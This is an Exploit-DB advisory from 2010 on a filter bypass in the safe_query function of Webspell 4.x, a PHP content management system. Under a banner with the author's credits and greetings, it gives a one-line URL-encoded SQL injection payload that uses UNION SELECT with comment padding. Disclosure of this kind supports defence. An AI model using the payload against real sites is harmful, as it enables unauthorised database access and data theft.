Webspell 4.x - safe_query Bypass Vulnerability

2010-09-29T00:00:00
ID EDB-ID:15153
Type exploitdb
Reporter silent vapor
Modified 2010-09-29T00:00:00

Description

Webspell 4.X safe_query Bypass Vulnerability. Webapps exploit for php platform

                                        
                                            ################# INFORMATION ##################################################
+Name : Webspell 4.X safe_query bypass Vulnerability
+Author : silent vapor
+Date   : 29.09.2010
+Script  : webspell
+Price : free
+Language :PHP
+Discovered by silent vapor
+Underground Agents
+Greetz to Team-Internet, 4004-Security-Project, Easy Laster
################################################################################

+Vulnerability : webspell_settings.php "function safe_query"

+Exploitable   : %20UNION+/**/+SELECT%20

################################################################################